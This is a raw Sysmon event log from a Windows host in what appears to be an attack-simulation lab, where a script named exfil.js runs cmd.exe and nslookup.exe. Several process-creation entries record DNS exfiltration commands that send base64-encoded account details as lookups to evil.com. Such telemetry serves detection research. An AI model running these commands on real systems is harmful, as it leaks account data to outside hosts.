14:16:39.286{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.286{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.286{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5841-000000005F02}8012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.286{2E1864BB-17A1-629A-783D-000000005F02}55527520C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-5841-000000005F02}8012C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.295{2E1864BB-17C7-629A-5841-000000005F02}8012C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzegv.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.286{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqyjum.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.217{2E1864BB-17C7-629A-5641-000000005F02}79767952C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5741-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.201{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5741-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.201{2E1864BB-17C7-629A-5541-000000005F02}48647652C:\Windows\system32\cmd.exe{2E1864BB-17C7-629A-5741-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.209{2E1864BB-17C7-629A-5741-000000005F02}6196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C7-629A-5541-000000005F02}4864C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqyjum.tmp 2>&1 10341000x8000000000000000202565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.170{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5641-000000005F02}7976C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.170{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C7-629A-5641-000000005F02}7976C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.170{2E1864BB-17C7-629A-5641-000000005F02}79767952C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5541-000000005F02}4864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.154{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5641-000000005F02}7976C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C7-629A-5541-000000005F02}4864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000202556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-17A1-629A-783D-000000005F02}55527880C:\Windows\System32\WScript.exe{2E1864BB-17C7-629A-5541-000000005F02}4864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000202555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.149{2E1864BB-17C7-629A-5541-000000005F02}4864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqyjum.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000202554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.139{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwkscf.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000202553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-17C7-629A-5341-000000005F02}28124288C:\Windows\system32\conhost.exe{2E1864BB-17C7-629A-5441-000000005F02}2800C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000202549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.116{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 